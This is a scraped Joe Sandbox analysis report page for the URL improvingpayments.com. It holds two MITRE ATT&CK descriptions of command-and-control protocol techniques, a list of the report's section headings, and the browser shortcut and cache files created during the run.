Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://improvingpayments.com

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 117

Chrome Cache Entry: 118

Chrome Cache Entry: 119

Chrome Cache Entry: 120

Chrome Cache Entry: 121

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 126

Chrome Cache Entry: 127

Chrome Cache Entry: 128

Chrome Cache Entry: 129

Chrome Cache Entry: 131

Chrome Cache Entry: 132

Chrome Cache Entry: 133

Chrome Cache Entry: 134

Chrome Cache Entry: 135

Chrome Cache Entry: 136

Windows Analysis Report
http://improvingpayments.com